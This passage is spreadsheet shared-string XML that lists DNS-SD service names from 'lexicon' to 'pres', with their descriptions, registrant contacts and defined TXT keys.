  <si>
    <t>lexicon</t>
  </si>
  <si>
    <t>Lexicon Vocabulary Sharing</t>
  </si>
  <si>
    <t>[Jacob_Godwin_Jones]</t>
  </si>
  <si>
    <t>liaison</t>
  </si>
  <si>
    <t>Liaison</t>
  </si>
  <si>
    <t>[Brian_Cully]</t>
  </si>
  <si>
    <t>library</t>
  </si>
  <si>
    <t>Delicious Library 2 Collection Data Sharing Protocol</t>
  </si>
  <si>
    <t>[William_Shipley]</t>
  </si>
  <si>
    <t>libratone</t>
  </si>
  <si>
    <t>Protocol for setup and control of Libratone products</t>
  </si>
  <si>
    <t>[Libratone_AS]</t>
  </si>
  <si>
    <t>[Claus_Jensen]</t>
  </si>
  <si>
    <t>licor</t>
  </si>
  <si>
    <t>LI-COR Biosciences instrument discovery</t>
  </si>
  <si>
    <t>[Software_LI-COR_Biosciences]</t>
  </si>
  <si>
    <t>[Kevin_Ediger]</t>
  </si>
  <si>
    <t>llrp-secure</t>
  </si>
  <si>
    <t>RFID reader Low Level Reader Protocol over SSL/TLS</t>
  </si>
  <si>
    <t>[Jason_Schoon_2]</t>
  </si>
  <si>
    <t>lobby</t>
  </si>
  <si>
    <t>Gobby</t>
  </si>
  <si>
    <t>[Gobby_0x539]</t>
  </si>
  <si>
    <t>logicnode</t>
  </si>
  <si>
    <t>Logic Pro Distributed Audio</t>
  </si>
  <si>
    <t>[Nikolaus_Gerteis]</t>
  </si>
  <si>
    <t>logsheetserver</t>
  </si>
  <si>
    <t>logSheet Server Synchronization Server</t>
  </si>
  <si>
    <t>[X2_Studios_Ltd]</t>
  </si>
  <si>
    <t>[Jason_McNeil]</t>
  </si>
  <si>
    <t>Defined TXT keys: lssvers</t>
  </si>
  <si>
    <t>lonbridge</t>
  </si>
  <si>
    <t>Echelon LonBridge Server</t>
  </si>
  <si>
    <t>[Rich_Blomseth]</t>
  </si>
  <si>
    <t>lontalk</t>
  </si>
  <si>
    <t>LonTalk over IP (ANSI 852)</t>
  </si>
  <si>
    <t>[Michael_Tennefoss]</t>
  </si>
  <si>
    <t>Echelon LNS Remote Client</t>
  </si>
  <si>
    <t>lsys-appserver</t>
  </si>
  <si>
    <t>Linksys One Application Server API</t>
  </si>
  <si>
    <t>[Frank_Zerangue]</t>
  </si>
  <si>
    <t>Defined TXT keys:    path=value (relative URL)
   engname=value (string)</t>
  </si>
  <si>
    <t>lsys-camera</t>
  </si>
  <si>
    <t>Linksys One Camera API</t>
  </si>
  <si>
    <t>Defined TXT keys:    brand=value (string)
   model=value (string)
   version=value (string)</t>
  </si>
  <si>
    <t>lsys-ezcfg</t>
  </si>
  <si>
    <t>LinkSys EZ Configuration</t>
  </si>
  <si>
    <t>Defined TXT keys:   model=value (string)
  serial=value (sring)
  hwversion=value (string)
  swversion=value (string)
  ifversion=value (string)
  type=value (string)
  mac=value (12 hex digits)</t>
  </si>
  <si>
    <t>lsys-oamp</t>
  </si>
  <si>
    <t>LinkSys Operations, Administration, Management, and Provisioning</t>
  </si>
  <si>
    <t>lumiere</t>
  </si>
  <si>
    <t>A protocol to remotely control DMX512 devices over the network</t>
  </si>
  <si>
    <t>[Gangsta_Ltd]</t>
  </si>
  <si>
    <t>[Jean-Charles_Boude]</t>
  </si>
  <si>
    <t>lumis-lca</t>
  </si>
  <si>
    <t>Lumis Cache Appliance Protocol</t>
  </si>
  <si>
    <t>[Lumis]</t>
  </si>
  <si>
    <t>[Rodrigo_Terra]</t>
  </si>
  <si>
    <t>lux-dtp</t>
  </si>
  <si>
    <t>Lux Solis Data Transport Protocol</t>
  </si>
  <si>
    <t>[Laurence_Flath]</t>
  </si>
  <si>
    <t>lxi</t>
  </si>
  <si>
    <t>LXI</t>
  </si>
  <si>
    <t>[Nick_Barendt_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, *IDN?=&lt;response defined by IEEE 488; e.g., manufacturer, model, serial number, version&gt;</t>
  </si>
  <si>
    <t>lyrics</t>
  </si>
  <si>
    <t>iPod Lyrics Service</t>
  </si>
  <si>
    <t>[Gary_Giebler]</t>
  </si>
  <si>
    <t>M30S1PT</t>
  </si>
  <si>
    <t>Moritz30-Project Standard protocol 1 Plain Text</t>
  </si>
  <si>
    <t>[Moritz30]</t>
  </si>
  <si>
    <t>[Matthias_Merkel]</t>
  </si>
  <si>
    <t>macfoh</t>
  </si>
  <si>
    <t>MacFOH</t>
  </si>
  <si>
    <t>[Shaun_Wexler]</t>
  </si>
  <si>
    <t>macfoh-admin</t>
  </si>
  <si>
    <t>MacFOH admin services</t>
  </si>
  <si>
    <t>macfoh-audio</t>
  </si>
  <si>
    <t>MacFOH audio stream</t>
  </si>
  <si>
    <t>macfoh-events</t>
  </si>
  <si>
    <t>MacFOH show control events</t>
  </si>
  <si>
    <t>macfoh-data</t>
  </si>
  <si>
    <t>MacFOH realtime data</t>
  </si>
  <si>
    <t>macfoh-db</t>
  </si>
  <si>
    <t>MacFOH database</t>
  </si>
  <si>
    <t>macfoh-remote</t>
  </si>
  <si>
    <t>MacFOH Remote</t>
  </si>
  <si>
    <t>macminder</t>
  </si>
  <si>
    <t>Mac Minder</t>
  </si>
  <si>
    <t>[Luma_Code]</t>
  </si>
  <si>
    <t>maestro</t>
  </si>
  <si>
    <t>Maestro Music Sharing Service</t>
  </si>
  <si>
    <t>[Luke_Steffen]</t>
  </si>
  <si>
    <t>magicdice</t>
  </si>
  <si>
    <t>Magic Dice Game Protocol</t>
  </si>
  <si>
    <t>[Mike_Yenco]</t>
  </si>
  <si>
    <t>mandos</t>
  </si>
  <si>
    <t>Mandos Password Server</t>
  </si>
  <si>
    <t>[Mandos_Maintainers]</t>
  </si>
  <si>
    <t>mas</t>
  </si>
  <si>
    <t>Pravala Mobility and Aggregation Service</t>
  </si>
  <si>
    <t>[Pravala_Networks_ULC]</t>
  </si>
  <si>
    <t>[Severn_Tsui]</t>
  </si>
  <si>
    <t>matrix</t>
  </si>
  <si>
    <t>MATRIX Remote AV Switching</t>
  </si>
  <si>
    <t>[Ken_Jibiki]</t>
  </si>
  <si>
    <t>mavlink</t>
  </si>
  <si>
    <t>MAVLink Micro Air Vehicle Communication Protocol</t>
  </si>
  <si>
    <t>[Roderick_Mann]</t>
  </si>
  <si>
    <t>Defined TXT keys: 0</t>
  </si>
  <si>
    <t>mazepseudo-game</t>
  </si>
  <si>
    <t>Peer to peer communication between instances of the Maze Pseudo game.</t>
  </si>
  <si>
    <t>[Mad_Elf_Software_Inc.]</t>
  </si>
  <si>
    <t>[Kenneth_Suda]</t>
  </si>
  <si>
    <t>Defined TXT keys: 1 TXT record key for the RSA public key used by the server instance.</t>
  </si>
  <si>
    <t>mbconsumer</t>
  </si>
  <si>
    <t>MediaBroker++ Consumer</t>
  </si>
  <si>
    <t>[Nate_Rivard]</t>
  </si>
  <si>
    <t>mbproducer</t>
  </si>
  <si>
    <t>MediaBroker++ Producer</t>
  </si>
  <si>
    <t>mbserver</t>
  </si>
  <si>
    <t>MediaBroker++ Server</t>
  </si>
  <si>
    <t>mconnect</t>
  </si>
  <si>
    <t>ClairMail Connect</t>
  </si>
  <si>
    <t>[Sachin_Desai]</t>
  </si>
  <si>
    <t>mcrcp</t>
  </si>
  <si>
    <t>MediaCentral</t>
  </si>
  <si>
    <t>[equinux]</t>
  </si>
  <si>
    <t>mediaboard1</t>
  </si>
  <si>
    <t>MediaBoardONE Asset and Information Manager data sharing and synchronization protocol</t>
  </si>
  <si>
    <t>[Thomas_K_Fischer]</t>
  </si>
  <si>
    <t>mediatap</t>
  </si>
  <si>
    <t>Mediatap streaming protocol</t>
  </si>
  <si>
    <t>[Mediatap_GbR]</t>
  </si>
  <si>
    <t>[Mario_PÃ¶rner]</t>
  </si>
  <si>
    <t>mercurydock</t>
  </si>
  <si>
    <t>Mercury Dock Assistant</t>
  </si>
  <si>
    <t>[Spider_Electronics]</t>
  </si>
  <si>
    <t>[Kenny_Millar]</t>
  </si>
  <si>
    <t>Defined TXT keys:  status, signature, ver</t>
  </si>
  <si>
    <t>mesamis</t>
  </si>
  <si>
    <t>Mes Amis</t>
  </si>
  <si>
    <t>[David_Priest]</t>
  </si>
  <si>
    <t>mi-raysat</t>
  </si>
  <si>
    <t>Mental Ray for Maya</t>
  </si>
  <si>
    <t>[Autodesk]</t>
  </si>
  <si>
    <t>mieleacs</t>
  </si>
  <si>
    <t>Protocol for connected accessories</t>
  </si>
  <si>
    <t>[Miele_and_Cie._KG]</t>
  </si>
  <si>
    <t>[Nils_Langhammer]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers and proprietary keys</t>
  </si>
  <si>
    <t>mieleathome</t>
  </si>
  <si>
    <t>Miele@home Protocol</t>
  </si>
  <si>
    <t>mieleprof</t>
  </si>
  <si>
    <t>Miele protocol for prof. appliances</t>
  </si>
  <si>
    <t>mielesemiprof</t>
  </si>
  <si>
    <t>Miele protocol for semi prof. appliances</t>
  </si>
  <si>
    <t>mist</t>
  </si>
  <si>
    <t>A Medical Interoperability Service Type, used to identify medical devices providing network interfaces.</t>
  </si>
  <si>
    <t>[Jon_Griffeth]</t>
  </si>
  <si>
    <t>Defined TXT keys: https://www.praesentia.com/medkit/mist-service-type (dn dt md mf pr sn vn)</t>
  </si>
  <si>
    <t>mmm</t>
  </si>
  <si>
    <t>Provides a client with access to the Mathematical Mesh, a 
      user-focused PKI.</t>
  </si>
  <si>
    <t>[Phillip_Hallam-Baker]</t>
  </si>
  <si>
    <t>mn-passage</t>
  </si>
  <si>
    <t>[Midnight_Oil_Enterprises_LLC]</t>
  </si>
  <si>
    <t>[Dan_Corkill]</t>
  </si>
  <si>
    <t>Defined TXT keys: inherited from bonjour/iOS multipeer connectivity</t>
  </si>
  <si>
    <t>modolansrv</t>
  </si>
  <si>
    <t>modo LAN Services</t>
  </si>
  <si>
    <t>[Matt_Craig]</t>
  </si>
  <si>
    <t>mogeneti-auth</t>
  </si>
  <si>
    <t>Authentication service for Mogeneti Software Applications</t>
  </si>
  <si>
    <t>[Mogeneti]</t>
  </si>
  <si>
    <t>[Bart_Rijpers]</t>
  </si>
  <si>
    <t>moncon</t>
  </si>
  <si>
    <t>Sonnox MCON monitor controller protocol</t>
  </si>
  <si>
    <t>[Sonnox_Ltd]</t>
  </si>
  <si>
    <t>[Nicolas_Haynes]</t>
  </si>
  <si>
    <t>moneysync</t>
  </si>
  <si>
    <t>SplashMoney Synchronization Service</t>
  </si>
  <si>
    <t>moneyworks</t>
  </si>
  <si>
    <t>MoneyWorks Gold and MoneyWorks Datacentre network service</t>
  </si>
  <si>
    <t>[Rowan_Daniell]</t>
  </si>
  <si>
    <t>moodring</t>
  </si>
  <si>
    <t>Bonjour Mood Ring tutorial program</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1 mood=&lt;ascii digit from 0-4&gt;</t>
  </si>
  <si>
    <t>mother</t>
  </si>
  <si>
    <t>Mother script server protocol</t>
  </si>
  <si>
    <t>[Jonathan]</t>
  </si>
  <si>
    <t>Defined TXT keys: user, ssl</t>
  </si>
  <si>
    <t>movieslate</t>
  </si>
  <si>
    <t>MovieSlate digital clapperboard</t>
  </si>
  <si>
    <t>[Cliff_Joyce]</t>
  </si>
  <si>
    <t>mp3sushi</t>
  </si>
  <si>
    <t>MP3 Sushi</t>
  </si>
  <si>
    <t>[Alexandre_Carlhian]</t>
  </si>
  <si>
    <t>IBM MQ Telemetry Transport Broker</t>
  </si>
  <si>
    <t>[AndySC]</t>
  </si>
  <si>
    <t>Defined TXT keys: topics=&lt;open topic to subscribe to for information&gt;, eg topic=/info</t>
  </si>
  <si>
    <t>mslingshot</t>
  </si>
  <si>
    <t>Martian SlingShot</t>
  </si>
  <si>
    <t>[Martin_Technology]</t>
  </si>
  <si>
    <t>Defined TXT keys: displayName, passwordRequired, acceptsUpdates</t>
  </si>
  <si>
    <t>msrps</t>
  </si>
  <si>
    <t>MSRP protocol over TLS</t>
  </si>
  <si>
    <t>Defined TXT keys:</t>
  </si>
  <si>
    <t>mumble</t>
  </si>
  <si>
    <t>Mumble VoIP communication protocol</t>
  </si>
  <si>
    <t>[Thorvald_Natvig]</t>
  </si>
  <si>
    <t>musicmachine</t>
  </si>
  <si>
    <t>Protocol for a distributed music playing service</t>
  </si>
  <si>
    <t>[Johan_Mjones]</t>
  </si>
  <si>
    <t>Defined TXT keys: apiversion, passreq</t>
  </si>
  <si>
    <t>mysync</t>
  </si>
  <si>
    <t>MySync Protocol</t>
  </si>
  <si>
    <t>[Martin_Redington]</t>
  </si>
  <si>
    <t>mttp</t>
  </si>
  <si>
    <t>MenuTunes Sharing</t>
  </si>
  <si>
    <t>[iThink_Software]</t>
  </si>
  <si>
    <t>mxim-art2</t>
  </si>
  <si>
    <t>Maxim Integrated Products Automated Roadtest Mk II</t>
  </si>
  <si>
    <t>[Zach_Metzinger]</t>
  </si>
  <si>
    <t>mxim-ice</t>
  </si>
  <si>
    <t>Maxim Integrated Products In-circuit Emulator</t>
  </si>
  <si>
    <t>mxs</t>
  </si>
  <si>
    <t>MatrixStore</t>
  </si>
  <si>
    <t>[Object_Matrix]</t>
  </si>
  <si>
    <t>Defined TXT keys: None
  mxs.system.id=&lt;system id&gt;
  mxs.system.version=&lt;system layer version&gt;
  mxs.cluster.id=&lt;cluster id the system belongs to&gt;</t>
  </si>
  <si>
    <t>naio</t>
  </si>
  <si>
    <t>NetAcquire server input/output protocol</t>
  </si>
  <si>
    <t>[NetAcquire_Corporation]</t>
  </si>
  <si>
    <t>[David_Hauck]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, fn</t>
  </si>
  <si>
    <t>nasmon</t>
  </si>
  <si>
    <t>Proprietary communication protocol for NAS Monitor</t>
  </si>
  <si>
    <t>[Infinite_Loop]</t>
  </si>
  <si>
    <t>[Claus_Broch2]</t>
  </si>
  <si>
    <t>nasunifiler</t>
  </si>
  <si>
    <t>This DNS-SD service is used by mobile clients to locate the Nasuni Filer (a storage product) for a given company.</t>
  </si>
  <si>
    <t>[Nasuni_Corporation]</t>
  </si>
  <si>
    <t>[David_Shaw-Nasuni]</t>
  </si>
  <si>
    <t>Defined TXT keys: companyfullname == The name of the company hosting the Nasuni Filer</t>
  </si>
  <si>
    <t>ncbroadcast</t>
  </si>
  <si>
    <t>Network Clipboard Broadcasts</t>
  </si>
  <si>
    <t>[Thom_McGrath]</t>
  </si>
  <si>
    <t>Defined TXT keys: Contact The ZAZ Software &lt;networkclipboard at thezaz.com&gt;</t>
  </si>
  <si>
    <t>ncdirect</t>
  </si>
  <si>
    <t>Network Clipboard Direct Transfers</t>
  </si>
  <si>
    <t>ncount-issuer</t>
  </si>
  <si>
    <t>The issuer service in the n-Count electronic value transfer system</t>
  </si>
  <si>
    <t>[n-Count_Technology_BV]</t>
  </si>
  <si>
    <t>[Eduard_de_Jong]</t>
  </si>
  <si>
    <t>ncsyncserver</t>
  </si>
  <si>
    <t>Network Clipboard Sync Server</t>
  </si>
  <si>
    <t>nedap-aepu</t>
  </si>
  <si>
    <t>Nedap AEOS processing unit</t>
  </si>
  <si>
    <t>[Nedap]</t>
  </si>
  <si>
    <t>[Leon_van_der_Voort_van_der_Kleij]</t>
  </si>
  <si>
    <t>neoriders</t>
  </si>
  <si>
    <t>NeoRiders Client Discovery Protocol</t>
  </si>
  <si>
    <t>[Jesse_W_Towner]</t>
  </si>
  <si>
    <t>netready</t>
  </si>
  <si>
    <t>UpdateLogic NetReady Device Identification</t>
  </si>
  <si>
    <t>[UpdateLogic_Inc]</t>
  </si>
  <si>
    <t>[Chris_Nigbur]</t>
  </si>
  <si>
    <t>netrestore</t>
  </si>
  <si>
    <t>NetRestore</t>
  </si>
  <si>
    <t>[Mike_Bombich]</t>
  </si>
  <si>
    <t>Defined TXT keys: message, status, progress</t>
  </si>
  <si>
    <t>netvu-video</t>
  </si>
  <si>
    <t>AD Group NetVu Connected Video</t>
  </si>
  <si>
    <t>[AD_Holdings]</t>
  </si>
  <si>
    <t>[Kelvin_Lawson]</t>
  </si>
  <si>
    <t>nextcap</t>
  </si>
  <si>
    <t>Proprietary communication protocol for NextCap capture solution</t>
  </si>
  <si>
    <t>[NextDay_Aps]</t>
  </si>
  <si>
    <t>[Claus_Broch]</t>
  </si>
  <si>
    <t>nfs-domainroot</t>
  </si>
  <si>
    <t>NFS service for the domain root, the root of an organization's published file namespace.</t>
  </si>
  <si>
    <t>[RFC6641]</t>
  </si>
  <si>
    <t>ngr-keydist</t>
  </si>
  <si>
    <t>NGR Key Distribution</t>
  </si>
  <si>
    <t>ni</t>
  </si>
  <si>
    <t>National Instruments Network Device</t>
  </si>
  <si>
    <t>[National_Instruments]</t>
  </si>
  <si>
    <t>[Joshua_Prewitt]</t>
  </si>
  <si>
    <t>Defined TXT keys: MAC, DevClass, ProdId, ProdName, SerialNo, Status, ImgPath, Comment</t>
  </si>
  <si>
    <t>ni-ftp</t>
  </si>
  <si>
    <t>NI FTP</t>
  </si>
  <si>
    <t>[Steve_Kille]</t>
  </si>
  <si>
    <t>ni-mail</t>
  </si>
  <si>
    <t>NI MAIL</t>
  </si>
  <si>
    <t>ni-rt</t>
  </si>
  <si>
    <t>National Instruments Real-Time Target</t>
  </si>
  <si>
    <t>Defined TXT keys: MAC, OS, OSVer, ProcArch</t>
  </si>
  <si>
    <t>ni-sysapi</t>
  </si>
  <si>
    <t>National Instruments System API Service</t>
  </si>
  <si>
    <t>Defined TXT keys: MAC, Experts, Version</t>
  </si>
  <si>
    <t>nodel</t>
  </si>
  <si>
    <t>Lightweight event based control protocol utilising JavaScript Object Notation</t>
  </si>
  <si>
    <t>[Lumicom]</t>
  </si>
  <si>
    <t>[Michael_Cartmel]</t>
  </si>
  <si>
    <t>ntlx-arch</t>
  </si>
  <si>
    <t>American Dynamics Intellex Archive Management Service</t>
  </si>
  <si>
    <t>[Gary_Sands]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, macaddress, protovers, model, serial</t>
  </si>
  <si>
    <t>ntlx-ent</t>
  </si>
  <si>
    <t>American Dynamics Intellex Enterprise Management Service</t>
  </si>
  <si>
    <t>ntlx-video</t>
  </si>
  <si>
    <t>American Dynamics Intellex Video Service</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, macaddress, protovers, model, serial, control, event</t>
  </si>
  <si>
    <t>ntx</t>
  </si>
  <si>
    <t>Tenasys</t>
  </si>
  <si>
    <t>[Carl_Ellis]</t>
  </si>
  <si>
    <t>nusdp</t>
  </si>
  <si>
    <t>oak</t>
  </si>
  <si>
    <t>Oak Device Services</t>
  </si>
  <si>
    <t>[Oak_Labs_Inc.]</t>
  </si>
  <si>
    <t>[Flynn_Joffray]</t>
  </si>
  <si>
    <t>obf</t>
  </si>
  <si>
    <t>Observations Framework</t>
  </si>
  <si>
    <t>[Matthew_Baker]</t>
  </si>
  <si>
    <t>Defined TXT keys: version=&lt;value&gt;</t>
  </si>
  <si>
    <t>objective</t>
  </si>
  <si>
    <t>Means for clients to locate servers in an Objective (http://www.objective.com) instance.</t>
  </si>
  <si>
    <t>[Marc_Bailey]</t>
  </si>
  <si>
    <t>Defined TXT keys:   txtvers='1'
  type={'production'|'standby'|'test'|'demo'}
  protocol={['SOAP'],['CORBA']}
  transport=['iiop']|['http']</t>
  </si>
  <si>
    <t>oca</t>
  </si>
  <si>
    <t>Insecure OCP.1 protocol, which is the insecure TCP/IP implementation of the Object Control Architecture</t>
  </si>
  <si>
    <t>[OCA_Alliance]</t>
  </si>
  <si>
    <t>[Stephan_van_Tienen]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1 protovers=x</t>
  </si>
  <si>
    <t>ocasec</t>
  </si>
  <si>
    <t>Secure OCP.1 protocol, which is the secure TCP/IP implementation of the Object Control Architecture</t>
  </si>
  <si>
    <t>ocaws</t>
  </si>
  <si>
    <t>Insecure OCP.1 hosted on a WebSocket</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers protovers path</t>
  </si>
  <si>
    <t>oce</t>
  </si>
  <si>
    <t>Oce Common Exchange Protocol</t>
  </si>
  <si>
    <t>[Dion_Slijp]</t>
  </si>
  <si>
    <t>Defined TXT keys: type, version</t>
  </si>
  <si>
    <t>od-master</t>
  </si>
  <si>
    <t>OpenDirectory Master</t>
  </si>
  <si>
    <t>odabsharing</t>
  </si>
  <si>
    <t>OD4Contact</t>
  </si>
  <si>
    <t>[Objective_Decision]</t>
  </si>
  <si>
    <t>odisk</t>
  </si>
  <si>
    <t>Optical Disk Sharing</t>
  </si>
  <si>
    <t>officetime-sync</t>
  </si>
  <si>
    <t>OfficeTime Synchronization Protocol</t>
  </si>
  <si>
    <t>[Support]</t>
  </si>
  <si>
    <t>ofocus-conf</t>
  </si>
  <si>
    <t>OmniFocus setting configuration</t>
  </si>
  <si>
    <t>[Timothy_J_Wood]</t>
  </si>
  <si>
    <t>ofocus-sync</t>
  </si>
  <si>
    <t>OmniFocus document synchronization</t>
  </si>
  <si>
    <t>ola</t>
  </si>
  <si>
    <t>Web Interface for the Open Lighting Architecture Software</t>
  </si>
  <si>
    <t>[Open_Lighting_Project]</t>
  </si>
  <si>
    <t>[Simon_Newton_2]</t>
  </si>
  <si>
    <t>Subtypes: _www-http
      Defined TXT keys: None</t>
  </si>
  <si>
    <t>olpc-activity1</t>
  </si>
  <si>
    <t>One Laptop per Child activity</t>
  </si>
  <si>
    <t>[One_Laptop_per_Child]</t>
  </si>
  <si>
    <t>Defined TXT keys: Shared_Activity_Protocol_1.0</t>
  </si>
  <si>
    <t>oma-bcast-sg</t>
  </si>
  <si>
    <t>OMA BCAST Service Guide Discovery Service</t>
  </si>
  <si>
    <t>[Stefan_Ekenberg]</t>
  </si>
  <si>
    <t>omadm-bootstrap</t>
  </si>
  <si>
    <t>Open Mobile Alliance (OMA) Device Management (DM) Bootstrap Server Discovery Service</t>
  </si>
  <si>
    <t>[Open_Mobile_Alliance]</t>
  </si>
  <si>
    <t>[Open_Mobile_Alliance_Device_Management_DM_Working_Group]</t>
  </si>
  <si>
    <t>omni-bookmark</t>
  </si>
  <si>
    <t>OmniWeb</t>
  </si>
  <si>
    <t>[The_Omni_Group]</t>
  </si>
  <si>
    <t>omni-live</t>
  </si>
  <si>
    <t>Service for remote control of Omnisphere virtual instrument</t>
  </si>
  <si>
    <t>[Glenn_Olander_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: omni-livetxt.html</t>
  </si>
  <si>
    <t>onenet-info</t>
  </si>
  <si>
    <t>OneNet Application Information Service</t>
  </si>
  <si>
    <t>[Steven_Spitzer]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, protovers, path</t>
  </si>
  <si>
    <t>onenet-pairing</t>
  </si>
  <si>
    <t>OneNet Pairing</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, protovers, id, path</t>
  </si>
  <si>
    <t>onenet-pgn</t>
  </si>
  <si>
    <t>OneNet PGN Transport Service</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, protovers, nmea-name</t>
  </si>
  <si>
    <t>openbase</t>
  </si>
  <si>
    <t>OpenBase SQL</t>
  </si>
  <si>
    <t>opencu</t>
  </si>
  <si>
    <t>Conferencing Protocol</t>
  </si>
  <si>
    <t>[Marc_Manthey_2]</t>
  </si>
  <si>
    <t>openpath</t>
  </si>
  <si>
    <t>Discovery of OpenPath appliances</t>
  </si>
  <si>
    <t>[OpenPath_Security_Inc]</t>
  </si>
  <si>
    <t>[John_Hickey]</t>
  </si>
  <si>
    <t>oprofile</t>
  </si>
  <si>
    <t>oprofile server protocol</t>
  </si>
  <si>
    <t>[Rob_Bradford]</t>
  </si>
  <si>
    <t>oscit</t>
  </si>
  <si>
    <t>Open Sound Control Interface Transfer</t>
  </si>
  <si>
    <t>[Gaspard_Bucher]</t>
  </si>
  <si>
    <t>ovready</t>
  </si>
  <si>
    <t>ObjectVideo OV Ready Protocol</t>
  </si>
  <si>
    <t>[Gary_Myers]</t>
  </si>
  <si>
    <t>owhttpd</t>
  </si>
  <si>
    <t>OWFS (1-wire file system) web server</t>
  </si>
  <si>
    <t>[Paul_H_Alfille]</t>
  </si>
  <si>
    <t>parentcontrol</t>
  </si>
  <si>
    <t>Remote Parental Controls</t>
  </si>
  <si>
    <t>[John_Scalo]</t>
  </si>
  <si>
    <t>passwordwallet</t>
  </si>
  <si>
    <t>PasswordWallet Data Synchronization Protocol</t>
  </si>
  <si>
    <t>[Sanford_Selznick]</t>
  </si>
  <si>
    <t>pcast</t>
  </si>
  <si>
    <t>Mac OS X Podcast Producer Server</t>
  </si>
  <si>
    <t>[Nick_Brosnahan]</t>
  </si>
  <si>
    <t>p2pchat</t>
  </si>
  <si>
    <t>Peer-to-Peer Chat (Sample Java Bonjour application)</t>
  </si>
  <si>
    <t>[Roger_Pantos]</t>
  </si>
  <si>
    <t>p2pstorage-sec</t>
  </si>
  <si>
    <t>DataBOND p2p storage</t>
  </si>
  <si>
    <t>[Dell]</t>
  </si>
  <si>
    <t>[Jessica_Zhang]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, machineid, status</t>
  </si>
  <si>
    <t>pairandshare</t>
  </si>
  <si>
    <t>Pair &amp; Share data protocol</t>
  </si>
  <si>
    <t>[Intel]</t>
  </si>
  <si>
    <t>[Joshua_Boelter]</t>
  </si>
  <si>
    <t>panoply</t>
  </si>
  <si>
    <t>Panoply multimedia composite transfer protocol</t>
  </si>
  <si>
    <t>[Natarajan_Balasundar]</t>
  </si>
  <si>
    <t>parabay-p2p</t>
  </si>
  <si>
    <t>Parabay P2P protocol</t>
  </si>
  <si>
    <t>[Vishnu_Varadaraj]</t>
  </si>
  <si>
    <t>parity</t>
  </si>
  <si>
    <t>PA-R-I-Ty (Public Address - Radio - Intercom - Telefony)</t>
  </si>
  <si>
    <t>[ims_Info]</t>
  </si>
  <si>
    <t>[Oskar_Persano]</t>
  </si>
  <si>
    <t>pgpkey-hkp</t>
  </si>
  <si>
    <t>Horowitz Key Protocol (HKP)</t>
  </si>
  <si>
    <t>[Marc_Horowitz]</t>
  </si>
  <si>
    <t>pgpkey-http</t>
  </si>
  <si>
    <t>PGP Keyserver using HTTP/1.1</t>
  </si>
  <si>
    <t>[Jeroen_Massar_3]</t>
  </si>
  <si>
    <t>Defined TXT keys: path=&lt;path on the server where the HKP applications reside&gt;
                  normally: "path=/pks/"</t>
  </si>
  <si>
    <t>pgpkey-https</t>
  </si>
  <si>
    <t>PGP Keyserver using HTTPS</t>
  </si>
  <si>
    <t>pgpkey-ldap</t>
  </si>
  <si>
    <t>PGP Keyserver using LDAP</t>
  </si>
  <si>
    <t>pgpkey-mailto</t>
  </si>
  <si>
    <t>PGP Key submission using SMTP</t>
  </si>
  <si>
    <t>Defined TXT keys: user=&lt;user portion of the mail address&gt;</t>
  </si>
  <si>
    <t>photoparata</t>
  </si>
  <si>
    <t>Photo Parata Event Photography Software</t>
  </si>
  <si>
    <t>[Sam_Carleton]</t>
  </si>
  <si>
    <t>photoshow</t>
  </si>
  <si>
    <t>Show Photos over TCP</t>
  </si>
  <si>
    <t>[Hamed_Ishbaitah]</t>
  </si>
  <si>
    <t>photosmithsync</t>
  </si>
  <si>
    <t>Photosmith's iPad to Lightroom sync protocol</t>
  </si>
  <si>
    <t>[Photosmith]</t>
  </si>
  <si>
    <t>[Chris_Horne]</t>
  </si>
  <si>
    <t>pictua</t>
  </si>
  <si>
    <t>Pictua Intercommunication Protocol</t>
  </si>
  <si>
    <t>[Isaack_Rasmussen]</t>
  </si>
  <si>
    <t>piesync</t>
  </si>
  <si>
    <t>pieSync Computer to Computer Synchronization</t>
  </si>
  <si>
    <t>[Timothy_Wayper]</t>
  </si>
  <si>
    <t>piu</t>
  </si>
  <si>
    <t>Pedestal Interface Unit by RPM-PSI</t>
  </si>
  <si>
    <t>[James_Nikolai]</t>
  </si>
  <si>
    <t>pkixrep</t>
  </si>
  <si>
    <t>Public Key Infrastructure Repository Locator Service</t>
  </si>
  <si>
    <t>[RFC4386]</t>
  </si>
  <si>
    <t>poch</t>
  </si>
  <si>
    <t>Parallel OperatiOn and Control Heuristic (Pooch)</t>
  </si>
  <si>
    <t>[Dean_Dauger]</t>
  </si>
  <si>
    <t>pochi</t>
  </si>
  <si>
    <t>A presenter to audience transfer service</t>
  </si>
  <si>
    <t>[Ringo_Wathelet]</t>
  </si>
  <si>
    <t>Defined TXT keys: key "txtvers" for specification versioning, 
      and key "name" representing the advertising presentation string 
      value name for the audience application to retrieve and display.</t>
  </si>
  <si>
    <t>podcastproxy</t>
  </si>
  <si>
    <t>Protocol for communication between Podcast</t>
  </si>
  <si>
    <t>[Moritz_Schmale]</t>
  </si>
  <si>
    <t>pokeeye</t>
  </si>
  <si>
    <t>Communication channel for "Poke Eye" Elgato EyeTV remote controller</t>
  </si>
  <si>
    <t>[Kristoffer_Lawson]</t>
  </si>
  <si>
    <t>powereasy-erp</t>
  </si>
  <si>
    <t>PowerEasy ERP</t>
  </si>
  <si>
    <t>[Ulaganathan_Sriramul]</t>
  </si>
  <si>
    <t>Defined TXT keys: ip, port, name, instance, cgi-alias, major-version, minor-version, custom</t>
  </si>
  <si>
    <t>powereasy-pos</t>
  </si>
  <si>
    <t>PowerEasy Point of Sale</t>
  </si>
  <si>
    <t>[Murthy_Parthasarathi]</t>
  </si>
  <si>
    <t>Defined TXT keys: ip, port, type, device-id, major-version, minor-version, custom</t>
  </si>
  <si>
    <t>pplayer-ctrl</t>
  </si>
  <si>
    <t>Piano Player Remote Control</t>
  </si>
  <si>
    <t>[Juraj_Zopp]</t>
  </si>
  <si>
    <t>pres</t>
  </si>
  <si>
    <t>Presence</t>
  </si>
  <si>
    <t>Peer-to-peer messaging / Link-Local Messaging</t>
  </si>
  <si>
